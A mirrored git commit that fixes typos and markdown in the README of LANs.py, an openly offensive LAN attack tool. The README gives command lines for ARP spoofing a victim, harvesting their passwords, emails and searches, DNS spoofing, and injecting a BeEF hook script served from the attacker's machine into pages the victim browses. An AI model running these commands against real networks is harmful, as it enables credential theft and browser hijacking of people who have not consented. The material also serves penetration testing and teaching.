mirror of
https://github.com/DanMcInerney/LANs.py.git
synced 2025-07-06 13:02:20 -07:00
Merge pull request #19 from xarses/master
Fix up README typo and md syntax
This commit is contained in:
DanMcInerney
commit
f850bb46e7
1 changed files with 35 additions and 23 deletions
58
README.md
58
README.md
|
|
@ -11,20 +11,28 @@ Prereqs: Linux, scapy, python nfqueue-bindings 0.4.3+, aircrack-ng, python twist
|
|||
Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
|
||||
|
||||
|
||||
Full usaage: LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-set] [-p] [-na] [-n] [-i INTERFACE] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP]
|
||||
|
||||
|
||||
Simplest usage:
|
||||
Full usage:
|
||||
|
||||
``` shell
|
||||
LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d]
|
||||
[-v] [-dns DNSSPOOF] [-set] [-p] [-na] [-n] [-i INTERFACE] [-rip ROUTERIP]
|
||||
[-rmac ROUTERMAC] [-pcap PCAP]
|
||||
```
|
||||
|
||||
Usage
|
||||
-----
|
||||
|
||||
### Simplest usage:
|
||||
|
||||
``` shell
|
||||
python LANs.py
|
||||
```
|
||||
|
||||
Because there's no -ip option this will arp scan the network, compare it to a live running promiscuous capture, and list all the clients on the nextwork including their Windows netbios names along with how many data packets they're sending. so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.
|
||||
Because there's no -ip option this will arp scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending. so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.
|
||||
|
||||
Passive harvesting usage:
|
||||
### Passive harvesting usage:
|
||||
|
||||
```
|
||||
``` shell
|
||||
python LANs.py -u -d -p -ip 192.168.0.10
|
||||
```
|
||||
|
||||
|
|
@ -34,50 +42,51 @@ python LANs.py -u -d -p -ip 192.168.0.10
|
|||
|
||||
-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received; will also decode base64 if the email authentication is encrypted with it
|
||||
|
||||
-ip: target this IP address
|
||||
-ip: target this IP address
|
||||
|
||||
Easy to remember and will probably be the most common usage of the script: options u, d, p, like udp/tcp.
|
||||
|
||||
|
||||
HTML injection:
|
||||
### HTML injection:
|
||||
|
||||
```
|
||||
``` shell
|
||||
python LANs.py -b http://192.168.0.5:3000/hook.js
|
||||
```
|
||||
|
||||
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits.
|
||||
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits.
|
||||
|
||||
|
||||
```
|
||||
``` shell
|
||||
python LANs.py -c '<title>Owned.</title>'
|
||||
```
|
||||
|
||||
Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first `<head>` and failing that injects prior to the first `</head>`. This example will change the page title to 'Owned.'
|
||||
|
||||
|
||||
Read from pcap:
|
||||
### Read from pcap:
|
||||
|
||||
```
|
||||
``` shell
|
||||
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
|
||||
```
|
||||
|
||||
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.
|
||||
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.
|
||||
|
||||
|
||||
Aggressive usage:
|
||||
```
|
||||
### Aggressive usage:
|
||||
|
||||
``` shell
|
||||
python LANs.py -v -d -p -n -na -set -dns facebook.com -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
|
||||
```
|
||||
|
||||
All options:
|
||||
### All options:
|
||||
|
||||
```
|
||||
``` shell
|
||||
python LANs.py -h
|
||||
```
|
||||
|
||||
-b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
|
||||
|
||||
-c 'HTML CODE': inject arbitrary html code into pages the victim visits; include the quotes when selecting HTML to inject
|
||||
-c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
|
||||
|
||||
-d: open an xterm with driftnet to see all images they view
|
||||
|
||||
|
|
@ -87,7 +96,7 @@ python LANs.py -h
|
|||
|
||||
-i INTERFACE: specify interface; default is first interface in `ip route`, eg: -i wlan0
|
||||
|
||||
-ip: target this IP address
|
||||
-ip: target this IP address
|
||||
|
||||
-n: performs a quick nmap scan of the target
|
||||
|
||||
|
|
@ -116,7 +125,8 @@ Cleans the following on Ctrl-C:
|
|||
|
||||
|
||||
|
||||
Technical details:
|
||||
Technical details
|
||||
------------------
|
||||
|
||||
This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.
|
||||
|
||||
|
|
@ -128,6 +138,8 @@ You will need to update your nfqueue-bindings to the latest version (0.4.3 as ti
|
|||
def start(self, i, payload):
|
||||
|
||||
|
||||
License
|
||||
-------
|
||||
|
||||
########################################
|
||||
Copyright (c) 2013, Dan McInerney
|
||||
|
|
@ -137,7 +149,7 @@ Redistribution and use in source and binary forms, with or without
|
|||
modification, are permitted provided that the following conditions are met:
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the name of the <organization> nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
* Neither the name of the Dan McInerney nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
||||
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue